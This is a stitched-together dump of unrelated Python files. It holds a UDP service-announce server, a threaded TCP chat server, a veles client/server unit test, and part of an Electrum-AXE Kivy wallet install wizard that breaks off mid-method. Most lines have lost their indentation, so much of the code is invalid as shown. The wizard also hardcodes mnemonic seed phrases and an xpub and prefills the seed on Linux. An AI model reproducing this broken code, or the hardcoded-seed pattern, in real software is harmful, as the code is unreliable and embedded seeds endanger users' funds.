print(f"Read {i}th image...")
img_displayer.display(img)
print("Program ends")
if __name__ == "__main__":
test_ReadFromWebcam()
|
server.py
|
#!/usr/bin/env python
import sys
sys.path.append("../")
import logging
import time
import uhej_server
import socket
import threading
import os
logger = logging.getLogger()
PORT = 5000
sock = None
def log_init(level):
logger.setLevel(level)
handler = logging.StreamHandler()
handler.setLevel(logging.INFO)
formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')
handler.setFormatter(formatter)
logger.addHandler(handler)
def open_socket(port):
    s = None
    while s is None:
        try:
            s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
            s.bind(("", port))
        except socket.error:
            logger.info("Socket in use, retrying")
            s = None  # bind failed: discard the half-created socket and retry
            time.sleep(1)
    return s
def service_thread():
global sock
while 1:
if sock is None:
time.sleep(1)
else:
try:
data, addr = sock.recvfrom(1024)
port = addr[1]
addr = addr[0]
logger.info("Got message: '%s' from %s" % (data.decode("utf-8"), addr))
except socket.error as e:
print("sock error"), e
thread = threading.Thread(target = service_thread)
thread.daemon = True
thread.start()
log_init(logging.INFO)
logger.info("Server starting")
#os.environ['TZ'] = 'UTC'
#time.tzset()
uhej_server.init()
if 1:
logger.info("Service on %s:%d" % (uhej_server.get_local_ip(), PORT))
sock = open_socket(PORT)
uhej_server.announce_udp("test service", PORT)
uhej_server.announce_udp("tftp", 69)
while 1:
time.sleep(10)
else:
counter = 0
while 1:
logger.info("Service on %s:%d" % (uhej_server.get_local_ip(), PORT))
sock = open_socket(PORT)
uhej_server.announce_udp("test service", PORT)
time.sleep(10)
sock.close()
sock = None
uhej_server.cancel("test service")
time.sleep(10)
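# --- Editor's sketch (not part of the original script) ----------------------
# Hedged example of a client for the UDP service announced above: it sends a
# single datagram to the given port, which service_thread() will receive and
# log. Intended to be run from a separate process; host and message are
# placeholders.
def _example_send_datagram(host="127.0.0.1", port=PORT, message="hello uhej"):
    c = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    try:
        c.sendto(message.encode("utf-8"), (host, port))
    finally:
        c.close()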
|
server.py
|
# -*- coding: utf-8 -*-
"""
Created on Tue Oct 26 01:00:38 2021
@author: Louis
"""
import socket
from threading import Thread
# server's IP address
SERVER_HOST = "0.0.0.0"
SERVER_PORT = 5002 # port we want to use
separator_token = "<SEP>" # we will use this to separate the client name & message
# initialize list/set of all connected client's sockets
client_sockets = set()
# create a TCP socket
s = socket.socket()
# allow the port to be reused
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
# bind the socket to the address we specified
s.bind((SERVER_HOST, SERVER_PORT))
# listen for incoming connections
s.listen(5)
print(f"[*] Listening as {SERVER_HOST}:{SERVER_PORT}")
def listen_for_client(cs):
"""
This function keep listening for a message from `cs` socket
Whenever a message is received, broadcast it to all other connected clients
"""
while True:
try:
# keep listening for a message from `cs` socket
msg = cs.recv(1024).decode()
except Exception as e:
    # the client is no longer connected; remove it from the set and stop
    print(f"[!] Error: {e}")
    client_sockets.remove(cs)
    break
else:
# if we received a message, replace the <SEP>
# token with ": " for nice printing
msg = msg.replace(separator_token, ": ")
# iterate over all connected sockets
for client_socket in client_sockets:
# and send the message
client_socket.send(msg.encode())
while True:
# we keep listening for new connections all the time
client_socket, client_address = s.accept()
print(f"[+] {client_address} connected.")
# add the new connected client to connected sockets
client_sockets.add(client_socket)
# start a new thread that listens for each client's messages
t = Thread(target=listen_for_client, args=(client_socket,))
# make the thread daemon so it ends whenever the main thread ends
t.daemon = True
# start the thread
t.start()
# close client sockets
for cs in client_sockets:
cs.close()
# close server socket
s.close()
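# --- Editor's sketch (not part of the original script) ----------------------
# Hedged example of a matching chat client: it connects to the server above,
# prefixes every outgoing message with a name and the <SEP> token (which the
# server replaces with ": "), and prints whatever the server broadcasts back.
# Intended to be run as a separate script; host, port and name are placeholders.
def _example_chat_client(host="127.0.0.1", port=SERVER_PORT, name="guest"):
    c = socket.socket()
    c.connect((host, port))
    def _listen():
        while True:
            print(c.recv(1024).decode())
    Thread(target=_listen, daemon=True).start()
    while True:
        text = input()
        c.send(f"{name}{separator_token}{text}".encode())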
|
test_network.py
|
# -*- coding: utf-8 -*-
"""
.. invisible:
_ _ _____ _ _____ _____
| | | | ___| | | ___/ ___|
| | | | |__ | | | |__ \ `--.
| | | | __|| | | __| `--. \
\ \_/ / |___| |___| |___/\__/ /
\___/\____/\_____|____/\____/
Created on Jan 23, 2014
███████████████████████████████████████████████████████████████████████████████
Licensed to the Apache Software Foundation (ASF) under one
or more contributor license agreements. See the NOTICE file
distributed with this work for additional information
regarding copyright ownership. The ASF licenses this file
to you under the Apache License, Version 2.0 (the
"License"); you may not use this file except in compliance
with the License. You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing,
software distributed under the License is distributed on an
"AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
KIND, either express or implied. See the License for the
specific language governing permissions and limitations
under the License.
███████████████████████████████████████████████████████████████████████████████
"""
import logging
import threading
import unittest
from six import BytesIO, PY3
from twisted.internet import reactor
from veles.backends import NumpyDevice
import veles.client as client
from veles.txzmq.connection import ZmqConnection
from veles.prng import get as get_rg
import veles.server as server
from veles.tests import DummyLauncher
from veles.workflow import Workflow
class TestWorkflow(Workflow):
job_requested = False
job_done = False
update_applied = False
power_requested = False
job_dropped = False
sync = threading.Event()
def __init__(self, **kwargs):
self._launcher = DummyLauncher()
super(TestWorkflow, self).__init__(self._launcher, **kwargs)
self.is_running = True
self.device = NumpyDevice()
@Workflow.run_timed
@Workflow.method_timed
def generate_data_for_slave(self, slave):
TestWorkflow.job_requested = True
return {'objective': 'win'}
def do_job(self, job, update, callback):
if isinstance(job, dict):
TestWorkflow.job_done = True
callback(job)
@Workflow.run_timed
@Workflow.method_timed
def apply_data_from_slave(self, obj, slave):
if TestWorkflow.update_applied:
TestWorkflow.sync.set()
if isinstance(obj, dict):
TestWorkflow.update_applied = True
return True
return False
def drop_slave(self, slave):
TestWorkflow.job_dropped = True
@property
def computing_power(self):
TestWorkflow.power_requested = True
return 100
@property
def is_slave(self):
return False
@property
def is_master(self):
return False
@property
def is_standalone(self):
return True
def add_ref(self, workflow):
pass
class TestClientServer(unittest.TestCase):
def setUp(self):
self.master = TestWorkflow()
self.slave = TestWorkflow()
self.server = server.Server("127.0.0.1:5050", self.master)
self.client = client.Client("127.0.0.1:5050", self.slave)
self.stopper = threading.Thread(target=self.stop)
self.stopper.start()
self.master.thread_pool.start()
def stop(self):
TestWorkflow.sync.wait(1.0)
reactor.callFromThread(reactor.stop)
def tearDown(self):
pass
def testWork(self):
reactor.run()
self.stopper.join()
self.assertTrue(TestWorkflow.job_requested, "Job was not requested.")
self.assertTrue(TestWorkflow.job_done, "Job was not done.")
self.assertTrue(TestWorkflow.update_applied, "Update was not applied.")
self.assertTrue(TestWorkflow.power_requested,
"Power was not requested.")
self.assertTrue(TestWorkflow.job_dropped,
"Job was not dropped in the end.")
class TestZmqConnection(unittest.TestCase):
def testPicklingUnpickling(self):
class FakeSocket(object):
def __init__(self, bio):
self._bio = bio
@property
def data(self):
return self._bio.getbuffer() if PY3 else self._bio.getvalue()
def send(self, data, *args, **kwargs):
self._bio.write(data)
idata = get_rg().bytes(128000)
bufsize = 4096
for codec in range(4):
socket = FakeSocket(BytesIO())
pickler = ZmqConnection.Pickler(socket,
codec if PY3 else chr(codec))
offset = 0
while (offset < len(idata)):
pickler.write(idata[offset:offset + bufsize])
offset += bufsize
pickler.flush()
print("Codec %d results %d bytes" % (codec, pickler.size))
unpickler = ZmqConnection.Unpickler()
unpickler.codec = codec if PY3 else chr(codec)
odata = socket.data
self.assertEqual(len(odata), pickler.size)
offset = 0
while (offset < len(odata)):
unpickler.consume(odata[offset:offset + bufsize])
offset += bufsize
merged = unpickler.merge_chunks()
self.assertEqual(len(idata), len(merged))
self.assertEqual(idata, merged)
if __name__ == "__main__":
logging.basicConfig(level=logging.DEBUG)
unittest.main()
|
installwizard.py
|
from functools import partial
import threading
import os
from kivy.app import App
from kivy.clock import Clock
from kivy.lang import Builder
from kivy.properties import ObjectProperty, StringProperty, OptionProperty
from kivy.core.window import Window
from kivy.uix.button import Button
from kivy.utils import platform
from kivy.uix.widget import Widget
from electrum_axe.base_wizard import BaseWizard
from electrum_axe.util import is_valid_email
from . import EventsDialog
from ...i18n import _
from .password_dialog import PasswordDialog
# global Variables
is_test = (platform == "linux")
test_seed = "grape impose jazz bind spatial mind jelly tourist tank today holiday stomach"
test_seed = "time taxi field recycle tiny license olive virus report rare steel portion achieve"
test_xpub = "xpub661MyMwAqRbcEbvVtRRSjqxVnaWVUMewVzMiURAKyYratih4TtBpMypzzefmv8zUNebmNVzB3PojdC5sV2P9bDgMoo9B3SARw1MXUUfU1GL"
Builder.load_string('''
#:import Window kivy.core.window.Window
#:import _ electrum_axe.gui.kivy.i18n._
<WizardTextInput@TextInput>
border: 4, 4, 4, 4
font_size: '15sp'
padding: '15dp', '15dp'
background_color: (1, 1, 1, 1) if self.focus else (0.454, 0.698, 0.909, 1)
foreground_color: (0.31, 0.31, 0.31, 1) if self.focus else (0.835, 0.909, 0.972, 1)
hint_text_color: self.foreground_color
background_active: 'atlas://electrum_axe/gui/kivy/theming/light/create_act_text_active'
background_normal: 'atlas://electrum_axe/gui/kivy/theming/light/create_act_text_active'
size_hint_y: None
height: '48sp'
<WizardButton@Button>:
root: None
size_hint: 1, None
height: '48sp'
on_press: if self.root: self.root.dispatch('on_press', self)
on_release: if self.root: self.root.dispatch('on_release', self)
<BigLabel@Label>
color: .854, .925, .984, 1
size_hint: 1, None
text_size: self.width, None
height: self.texture_size[1]
bold: True
<-WizardDialog>
text_color: .854, .925, .984, 1
value: ''
#auto_dismiss: False
size_hint: None, None
canvas.before:
Color:
rgba: (.45, .2, 0, 1) if app.testnet else (.239, .588, .882, 1)
Rectangle:
size: Window.size
crcontent: crcontent
# add electrum icon
BoxLayout:
orientation: 'vertical' if self.width < self.height else 'horizontal'
padding:
min(dp(27), self.width/32), min(dp(27), self.height/32),\
min(dp(27), self.width/32), min(dp(27), self.height/32)
spacing: '10dp'
GridLayout:
id: grid_logo
cols: 1
pos_hint: {'center_y': .5}
size_hint: 1, None
height: self.minimum_height
Label:
color: root.text_color
text: 'AXE ELECTRUM'
size_hint: 1, None
height: self.texture_size[1] if self.opacity else 0
font_size: '33sp'
font_name: 'electrum_axe/gui/kivy/data/fonts/tron/Tr2n.ttf'
Label:
color: root.text_color
text: 'TESTNET' if app.testnet else ''
size_hint: 1, None
height: self.texture_size[1] if self.opacity else 0
font_size: '33sp'
font_name: 'electrum_axe/gui/kivy/data/fonts/tron/Tr2n.ttf'
GridLayout:
cols: 1
id: crcontent
spacing: '1dp'
Widget:
size_hint: 1, 0.3
GridLayout:
rows: 1
spacing: '12dp'
size_hint: 1, None
height: self.minimum_height
WizardButton:
id: back
text: _('Back')
root: root
WizardButton:
id: next
text: _('Next')
root: root
disabled: root.value == ''
<WizardMultisigDialog>
value: 'next'
Widget
size_hint: 1, 1
Label:
color: root.text_color
size_hint: 1, None
text_size: self.width, None
height: self.texture_size[1]
text: _("Choose the number of signatures needed to unlock funds in your wallet")
Widget
size_hint: 1, 1
GridLayout:
orientation: 'vertical'
cols: 2
spacing: '14dp'
size_hint: 1, 1
height: self.minimum_height
Label:
color: root.text_color
text: _('From {} cosigners').format(n.value)
Slider:
id: n
range: 2, 5
step: 1
value: 2
Label:
color: root.text_color
text: _('Require {} signatures').format(m.value)
Slider:
id: m
range: 1, n.value
step: 1
value: 2
<WizardChoiceDialog>
message : ''
Widget:
size_hint: 1, 1
Label:
color: root.text_color
size_hint: 1, None
text_size: self.width, None
height: self.texture_size[1]
text: root.message
Widget
size_hint: 1, 1
GridLayout:
row_default_height: '48dp'
orientation: 'vertical'
id: choices
cols: 1
spacing: '14dp'
size_hint: 1, None
<WizardConfirmDialog>
message : ''
Widget:
size_hint: 1, 1
Label:
color: root.text_color
size_hint: 1, None
text_size: self.width, None
height: self.texture_size[1]
text: root.message
Widget
size_hint: 1, 1
<WizardTOSDialog>
message : ''
size_hint: 1, 1
ScrollView:
size_hint: 1, 1
TextInput:
color: root.text_color
size_hint: 1, None
text_size: self.width, None
height: self.minimum_height
text: root.message
disabled: True
<WizardEmailDialog>
Label:
color: root.text_color
size_hint: 1, None
text_size: self.width, None
height: self.texture_size[1]
text: 'Please enter your email address'
WizardTextInput:
id: email
on_text: Clock.schedule_once(root.on_text)
multiline: False
on_text_validate: Clock.schedule_once(root.on_enter)
<WizardKnownOTPDialog>
message : ''
message2: ''
Widget:
size_hint: 1, 1
Label:
color: root.text_color
size_hint: 1, None
text_size: self.width, None
height: self.texture_size[1]
text: root.message
Widget
size_hint: 1, 1
WizardTextInput:
id: otp
on_text: Clock.schedule_once(root.on_text)
multiline: False
on_text_validate: Clock.schedule_once(root.on_enter)
Widget
size_hint: 1, 1
Label:
color: root.text_color
size_hint: 1, None
text_size: self.width, None
height: self.texture_size[1]
text: root.message2
Widget
size_hint: 1, 1
height: '48sp'
BoxLayout:
orientation: 'horizontal'
WizardButton:
id: cb
text: _('Request new secret')
on_release: root.request_new_secret()
size_hint: 1, None
WizardButton:
id: abort
text: _('Abort creation')
on_release: root.abort_wallet_creation()
size_hint: 1, None
<WizardNewOTPDialog>
message : ''
message2 : ''
Label:
color: root.text_color
size_hint: 1, None
text_size: self.width, None
height: self.texture_size[1]
text: root.message
QRCodeWidget:
id: qr
size_hint: 1, 1
Label:
color: root.text_color
size_hint: 1, None
text_size: self.width, None
height: self.texture_size[1]
text: root.message2
WizardTextInput:
id: otp
on_text: Clock.schedule_once(root.on_text)
multiline: False
on_text_validate: Clock.schedule_once(root.on_enter)
<MButton@Button>:
size_hint: 1, None
height: '33dp'
on_release:
self.parent.update_amount(self.text)
<WordButton@Button>:
size_hint: None, None
padding: '5dp', '5dp'
text_size: None, self.height
width: self.texture_size[0]
height: '30dp'
on_release:
self.parent.new_word(self.text)
<SeedButton@Button>:
height: dp(100)
border: 4, 4, 4, 4
halign: 'justify'
valign: 'top'
font_size: '18dp'
text_size: self.width - dp(24), self.height - dp(12)
color: .1, .1, .1, 1
background_normal: 'atlas://electrum_axe/gui/kivy/theming/light/white_bg_round_top'
background_down: self.background_normal
size_hint_y: None
<SeedLabel@Label>:
font_size: '12sp'
text_size: self.width, None
size_hint: 1, None
height: self.texture_size[1]
halign: 'justify'
valign: 'middle'
border: 4, 4, 4, 4
<RestoreSeedDialog>
message: ''
word: ''
BigLabel:
text: "ENTER YOUR SEED PHRASE"
GridLayout
cols: 1
padding: 0, '12dp'
orientation: 'vertical'
spacing: '12dp'
size_hint: 1, None
height: self.minimum_height
SeedButton:
id: text_input_seed
text: ''
on_text: Clock.schedule_once(root.on_text)
on_release: root.options_dialog()
SeedLabel:
text: root.message
BoxLayout:
id: suggestions
height: '35dp'
size_hint: 1, None
new_word: root.on_word
BoxLayout:
id: line1
update_amount: root.update_text
size_hint: 1, None
height: '30dp'
MButton:
text: 'Q'
MButton:
text: 'W'
MButton:
text: 'E'
MButton:
text: 'R'
MButton:
text: 'T'
MButton:
text: 'Y'
MButton:
text: 'U'
MButton:
text: 'I'
MButton:
text: 'O'
MButton:
text: 'P'
BoxLayout:
id: line2
update_amount: root.update_text
size_hint: 1, None
height: '30dp'
Widget:
size_hint: 0.5, None
height: '33dp'
MButton:
text: 'A'
MButton:
text: 'S'
MButton:
text: 'D'
MButton:
text: 'F'
MButton:
text: 'G'
MButton:
text: 'H'
MButton:
text: 'J'
MButton:
text: 'K'
MButton:
text: 'L'
Widget:
size_hint: 0.5, None
height: '33dp'
BoxLayout:
id: line3
update_amount: root.update_text
size_hint: 1, None
height: '30dp'
Widget:
size_hint: 1, None
MButton:
text: 'Z'
MButton:
text: 'X'
MButton:
text: 'C'
MButton:
text: 'V'
MButton:
text: 'B'
MButton:
text: 'N'
MButton:
text: 'M'
MButton:
text: ' '
MButton:
text: '<'
<AddXpubDialog>
title: ''
message: ''
BigLabel:
text: root.title
GridLayout
cols: 1
padding: 0, '12dp'
orientation: 'vertical'
spacing: '12dp'
size_hint: 1, None
height: self.minimum_height
SeedButton:
id: text_input
text: ''
on_text: Clock.schedule_once(root.check_text)
SeedLabel:
text: root.message
GridLayout
rows: 1
spacing: '12dp'
size_hint: 1, None
height: self.minimum_height
IconButton:
id: scan
height: '48sp'
on_release: root.scan_xpub()
icon: 'atlas://electrum_axe/gui/kivy/theming/light/camera'
size_hint: 1, None
WizardButton:
text: _('Paste')
on_release: root.do_paste()
WizardButton:
text: _('Clear')
on_release: root.do_clear()
<ShowXpubDialog>
xpub: ''
message: _('Here is your master public key. Share it with your cosigners.')
BigLabel:
text: "MASTER PUBLIC KEY"
GridLayout
cols: 1
padding: 0, '12dp'
orientation: 'vertical'
spacing: '12dp'
size_hint: 1, None
height: self.minimum_height
SeedButton:
id: text_input
text: root.xpub
SeedLabel:
text: root.message
GridLayout
rows: 1
spacing: '12dp'
size_hint: 1, None
height: self.minimum_height
WizardButton:
text: _('QR code')
on_release: root.do_qr()
WizardButton:
text: _('Copy')
on_release: root.do_copy()
WizardButton:
text: _('Share')
on_release: root.do_share()
<ShowSeedDialog>
spacing: '12dp'
value: 'next'
BigLabel:
text: "PLEASE WRITE DOWN YOUR SEED PHRASE"
GridLayout:
id: grid
cols: 1
pos_hint: {'center_y': .5}
size_hint_y: None
height: self.minimum_height
orientation: 'vertical'
spacing: '12dp'
SeedButton:
text: root.seed_text
on_release: root.options_dialog()
SeedLabel:
text: root.message
<LineDialog>
BigLabel:
text: root.title
SeedLabel:
text: root.message
TextInput:
id: passphrase_input
multiline: False
size_hint: 1, None
height: '27dp'
SeedLabel:
text: root.warning
''')
class WizardDialog(EventsDialog):
''' Abstract dialog to be used as the base for all Create Account Dialogs
'''
crcontent = ObjectProperty(None)
def __init__(self, wizard, **kwargs):
self.auto_dismiss = False
super(WizardDialog, self).__init__()
self.wizard = wizard
self.ids.back.disabled = not wizard.can_go_back()
self.app = App.get_running_app()
self.run_next = kwargs['run_next']
self._trigger_size_dialog = Clock.create_trigger(self._size_dialog)
# note: everything bound here needs to be unbound as otherwise the
# objects will be kept around and keep receiving the callbacks
Window.bind(size=self._trigger_size_dialog,
rotation=self._trigger_size_dialog,
on_keyboard=self.on_keyboard)
self._trigger_size_dialog()
self._on_release = False
def _size_dialog(self, dt):
app = App.get_running_app()
if app.ui_mode[0] == 'p':
self.size = Window.size
else:
#tablet
if app.orientation[0] == 'p':
#portrait
self.size = Window.size[0]/1.67, Window.size[1]/1.4
else:
self.size = Window.size[0]/2.5, Window.size[1]
def add_widget(self, widget, index=0):
if not self.crcontent:
super(WizardDialog, self).add_widget(widget)
else:
self.crcontent.add_widget(widget, index=index)
def on_keyboard(self, instance, key, keycode, codepoint, modifier):
if key == 27:
if self.wizard.can_go_back():
self._on_release = True
self.dismiss()
self.wizard.go_back()
else:
app = App.get_running_app()
if not app.is_exit:
app.is_exit = True
app.show_info(_('Press again to exit'))
else:
self._on_release = False
self.dismiss()
return True
def on_dismiss(self):
Window.unbind(size=self._trigger_size_dialog,
rotation=self._trigger_size_dialog,
on_keyboard=self.on_keyboard)
app = App.get_running_app()
if app.wallet is None and not self._on_release:
app.stop()
def get_params(self, button):
return (None,)
def on_release(self, button):
self._on_release = True
self.dismiss()
if not button:
self.parent.dispatch('on_wizard_complete', None)
return
if button is self.ids.back:
self.wizard.go_back()
return
params = self.get_params(button)
self.run_next(*params)
class WizardMultisigDialog(WizardDialog):
def get_params(self, button):
m = self.ids.m.value
n = self.ids.n.value
return m, n
class WizardOTPDialogBase(WizardDialog):
def get_otp(self):
otp = self.ids.otp.text
if len(otp) != 6:
return
try:
return int(otp)
except:
return
def on_text(self, dt):
self.ids.next.disabled = self.get_otp() is None
def on_enter(self, dt):
# press next
next = self.ids.next
if not next.disabled:
next.dispatch('on_release')
class WizardKnownOTPDialog(WizardOTPDialogBase):
def __init__(self, wizard, **kwargs):
WizardOTPDialogBase.__init__(self, wizard, **kwargs)
self.message = _("This wallet is already registered with TrustedCoin. To finalize wallet creation, please enter your Google Authenticator Code.")
self.message2 =_("If you have lost your Google Authenticator account, you can request a new secret. You will need to retype your seed.")
self.request_new = False
def get_params(self, button):
return (self.get_otp(), self.request_new)
def request_new_secret(self):
self.request_new = True
self.on_release(True)
def abort_wallet_creation(self):
self._on_release = True
self.wizard.terminate(aborted=True)
self.dismiss()
class WizardNewOTPDialog(WizardOTPDialogBase):
def __init__(self, wizard, **kwargs):
WizardOTPDialogBase.__init__(self, wizard, **kwargs)
otp_secret = kwargs['otp_secret']
uri = "otpauth://totp/%s?secret=%s"%('trustedcoin.com', otp_secret)
self.message = "Please scan the following QR code in Google Authenticator. You may also use the secret key: %s"%otp_secret
self.message2 = _('Then, enter your Google Authenticator code:')
self.ids.qr.set_data(uri)
def get_params(self, button):
return (self.get_otp(), False)
class WizardTOSDialog(WizardDialog):
def __init__(self, wizard, **kwargs):
WizardDialog.__init__(self, wizard, **kwargs)
self.ids.next.text = 'Accept'
self.ids.next.disabled = False
self.message = kwargs['tos']
self.message2 = _('Enter your email address:')
class WizardEmailDialog(WizardDialog):
def get_params(self, button):
return (self.ids.email.text,)
def on_text(self, dt):
self.ids.next.disabled = not is_valid_email(self.ids.email.text)
def on_enter(self, dt):
# press next
next = self.ids.next
if not next.disabled:
next.dispatch('on_release')
class WizardConfirmDialog(WizardDialog):
def __init__(self, wizard, **kwargs):
super(WizardConfirmDialog, self).__init__(wizard, **kwargs)
self.message = kwargs.get('message', '')
self.value = 'ok'
def on_parent(self, instance, value):
if value:
app = App.get_running_app()
self._back = _back = partial(app.dispatch, 'on_back')
def get_params(self, button):
return (True,)
class WizardChoiceDialog(WizardDialog):
def __init__(self, wizard, **kwargs):
super(WizardChoiceDialog, self).__init__(wizard, **kwargs)
self.message = kwargs.get('message', '')
choices = kwargs.get('choices', [])
layout = self.ids.choices
layout.bind(minimum_height=layout.setter('height'))
for action, text in choices:
l = WizardButton(text=text)
l.action = action
l.height = '48dp'
l.root = self
layout.add_widget(l)
def on_parent(self, instance, value):
if value:
app = App.get_running_app()
self._back = _back = partial(app.dispatch, 'on_back')
def get_params(self, button):
return (button.action,)
class LineDialog(WizardDialog):
title = StringProperty('')
message = StringProperty('')
warning = StringProperty('')
def __init__(self, wizard, **kwargs):
WizardDialog.__init__(self, wizard, **kwargs)
self.ids.next.disabled = False
def get_params(self, b):
return (self.ids.passphrase_input.text,)
class ShowSeedDialog(WizardDialog):
seed_text = StringProperty('')
message = _("If you forget your PIN or lose your device, your seed phrase will be the only way to recover your funds.")
ext = False
def __init__(self, wizard, **kwargs):
super(ShowSeedDialog, self).__init__(wizard, **kwargs)
self.seed_text = kwargs['seed_text']
def on_parent(self, instance, value):
if value:
app = App.get_running_app()
self._back = _back = partial(self.ids.back.dispatch, 'on_release')
def options_dialog(self):
from .seed_options import SeedOptionsDialog
def callback(status):
self.ext = status
d = SeedOptionsDialog(self.ext, callback)
d.open()
def get_params(self, b):
return (self.ext,)
class WordButton(Button):
pass
class WizardButton(Button):
pass
class RestoreSeedDialog(WizardDialog):
def __init__(self, wizard, **kwargs):
super(RestoreSeedDialog, self).__init__(wizard, **kwargs)
self._test = kwargs['test']
from electrum_axe.mnemonic import Mnemonic
from electrum_axe.old_mnemonic import words as old_wordlist
self.words = set(Mnemonic('en').wordlist).union(set(old_wordlist))
self.ids.text_input_seed.text = test_seed if is_test else ''
self.message = _('Please type your seed phrase using the virtual keyboard.')
self.title = _('Enter Seed')
self.ext = False
def options_dialog(self):
from .seed_options import SeedOptionsDialog
def callback(status):
self.ext = status
d = SeedOptionsDialog(self.ext, callback)
d.open()
def get_suggestions(self, prefix):
for w in self.words:
if w.startswith(prefix):
yield w
def on_text(self, dt):
self.ids.next.disabled = not bool(self._test(self.get_text()))
text = self.ids.text_input_seed.text
if not text:
last_word = ''
elif text[-1] == ' ':
last_word = ''
else:
last_word = text.split(' ')[-1]
enable_space = False
self.ids.suggestions.clear_widgets()
suggestions = [x for x in self.get_suggestions(last_word)]
if last_word in suggestions:
b = WordButton(text=last_word)
self.ids.suggestions.add_widget(b)
enable_space = True
for w in suggestions:
if w != last_word and len(suggestions) < 10:
b = WordButton(text=w)
self.ids.suggestions.add_widget(b)
i = len(last_word)
p = set()
for x in suggestions:
if len(x)>i: p.add(x[i])
for line in [self.ids.line1, self.ids.line2, self.ids.line3]:
for c in line.children:
if isinstance(c, Button):
if c.text in 'ABCDEFGHIJKLMNOPQRSTUVWXYZ':
c.disabled = (c.text.lower() not in p) and bool(last_word)
elif c.text == ' ':
c.disabled = not enable_space
def on_word(self, w):
text = self.get_text()
words = text.split(' ')
words[-1] = w
text = ' '.join(words)
self.ids.text_input_seed.text = text + ' '
self.ids.suggestions.clear_widgets()
def get_text(self):
ti = self.ids.text_input_seed
return ' '.join(ti.text.strip().split())
def update_text(self, c):
c = c.lower()
text = self.ids.text_input_seed.text
if c == '<':
text = text[:-1]
else:
text += c
self.ids.text_input_seed.text = text
def on_parent(self, instance, value):
if value:
tis = self.ids.text_input_seed
tis.focus = True
#tis._keyboard.bind(on_key_down=self.on_key_down)
self._back = _back = partial(self.ids.back.dispatch,
'on_release')
app = App.get_running_app()
def on_key_down(self, keyboard, keycode, key, modifiers):
if keycode[0] in (13, 271):
self.on_enter()
return True
def on_enter(self):
#self._remove_keyboard()
# press next
next = self.ids.next
if not next.disabled:
next.dispatch('on_release')
def _remove_keyboard(self):
tis = self.ids.text_input_seed
if tis._keyboard:
tis._keyboard.unbind(on_key_down=self.on_key_down)
tis.focus = False
def get_params(self, b):
return (self.get_text(), False, self.ext)
class ConfirmSeedDialog(RestoreSeedDialog):
def get_params(self, b):
return (self.get_text(),)
def options_dialog(self):
pass
class ShowXpubDialog(WizardDialog):
def __init__(self, wizard, **kwargs):
WizardDialog.__init__(self, wizard, **kwargs)
self.xpub = kwargs['xpub']
self.ids.next.disabled = False
def do_copy(self):
self.app._clipboard.copy(self.xpub)
def do_share(self):
self.app.do_share(self.xpub, _("Master Public Key"))
def do_qr(self):
from .qr_dialog import QRDialog
popup = QRDialog(_("Master Public Key"), self.xpub, True)
popup.open()
class AddXpubDialog(WizardDialog):
def __init__(self, wizard, **kwargs):
WizardDialog.__init__(self, wizard, **kwargs)
def is_valid(x):
try:
return kwargs['is_valid'](x)
except:
return False
self.is_valid = is_valid
self.title = kwargs['title']
self.message = kwargs['message']
self.allow_multi = kwargs.get('allow_multi', False)
def check_text(self, dt):
self.ids.next.disabled = not bool(self.is_valid(self.get_text()))
def get_text(self):
ti = self.ids.text_input
return ti.text.strip()
def get_params(self, button):
return (self.get_text(),)
def scan_xpub(self):
def on_complete(text):
if self.allow_multi:
self.ids.text_input.text += text + '\n'
else:
self.ids.text_input.text = text
self.app.scan_qr(on_complete)
def do_paste(self):
self.ids.text_input.text = test_xpub if is_test else self.app._clipboard.paste()
def do_clear(self):
self.ids.text_input.text = ''
class InstallWizard(BaseWizard, Widget):
'''
events::
`on_wizard_complete` Fired when the wizard is done creating/ restoring
wallet/s.
'''
__events__ = ('on_wizard_complete', )
def on_wizard_complete(self, wallet):
"""overriden by main_window"""
pass
def waiting_dialog(self, task, msg, on_finished=None):
'''Perform a blocking task in the background by running the passed
method in a thread.
'''
def target():
# run your threaded function
try:
task()
except Exception as err:
self.show_error(str(err))
# on completion hide message
Clock.schedule_once(lambda dt: app.info_bubble.hide(now=True), -1)
if on_finished:
def protected_on_finished():
try:
on_finished()
except Exception as e:
self.show_error(str(e))
Clock.schedule_once(lambda dt: protected_on_finished(), -1)
app = App.get_running_app()
app.show_info_bubble(
text=msg, icon='atlas://electrum_axe/gui/kivy/theming/light/important',
pos=Window.center, width='200sp', arrow_pos=None, modal=True)
t = threading.Thread(target = target)
t.start()
def terminate(self, *, storage=None, aborted=False):
if storage is None and not aborted:
storage = self.create_storage(self.path)
self.dispatch('on_wizard_complete', storage)
def choice_dialog(self, **kwargs):
choices = kwargs['choices']
if len(choices) > 1:
WizardChoiceDialog(self, **kwargs).open()
else:
f = kwargs['run_next']
f(choices[0][0])
def multisig_dialog(self, **kwargs): WizardMultisigDialog(self, **kwargs).open()
def show_seed_dialog(self, **kwargs): ShowSeedDialog(self, **kwargs).open()
def line_dialog(self, **kwargs): LineDialog(self, **kwargs).open()
def confirm_seed_dialog(self, **kwargs):
kwargs['title'] = _('Confirm Seed')
kwargs['message'] = _('Please retype your seed phrase, to confirm that you properly saved it')
ConfirmSeedDialog(self, **kwargs).open()
def restore_seed_dialog(self, **kwargs):
RestoreSeedDialog(self, **kwargs).open()
def confirm_dialog(self, **kwargs):
WizardConfirmDialog(self, **kwargs).open()
def tos_dialog(self, **kwargs):
WizardTOSDialog(self, **kwargs).open()
def email_dialog(self, **kwargs):
WizardEmailDialog(self, **kwargs).open()
def otp_dialog(self, **kwargs):
if kwargs['otp_secret']:
WizardNewOTPDialog(self, **kwargs).open()
else:
WizardKnownOTPDialog(self, **kwargs).open()
def add_xpub_dialog(self, **kwargs):
kwargs['message'] += ' ' + _('Use the camera button to scan a QR code.')
AddXpubDialog(self, **kwargs).open()
def add_cosigner_dialog(self, **kwargs):
kwargs['title'] = _("Add Cosigner") + " %d"%kwargs['index']
kwargs['message'] = _("Please paste your cosigner's master public key, or scan it using the camera button.")
AddXpubDialog(self, **kwargs).open()
def show_xpub_dialog(self, **kwargs): ShowXpubDialog(self, **kwargs).open()
def show_message(self, msg): self.show_error(msg)
def show_error(self, msg):
app = App.get_running_app()
Clock.schedule_once(lambda dt: app.show_error(msg))
def request_password(self, run_next, force_disable_encrypt_cb=False):
if force_disable_encrypt_cb:
